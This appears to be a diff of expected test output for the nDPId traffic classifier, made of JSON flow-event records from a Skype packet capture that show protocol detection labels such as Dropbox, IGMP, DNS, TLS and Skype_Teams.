-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678945,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431970685839,"flow_last_seen":1431970687668,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648979,"flow_last_seen":1431970679027,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678945,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970635325,"flow_last_seen":1431970688837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970635325,"flow_last_seen":1431970688837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634731,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634731,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648982,"flow_last_seen":1431970679028,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678946,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648982,"flow_last_seen":1431970679028,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678946,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687261,"flow_last_seen":1431970707409,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687261,"flow_last_seen":1431970707409,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 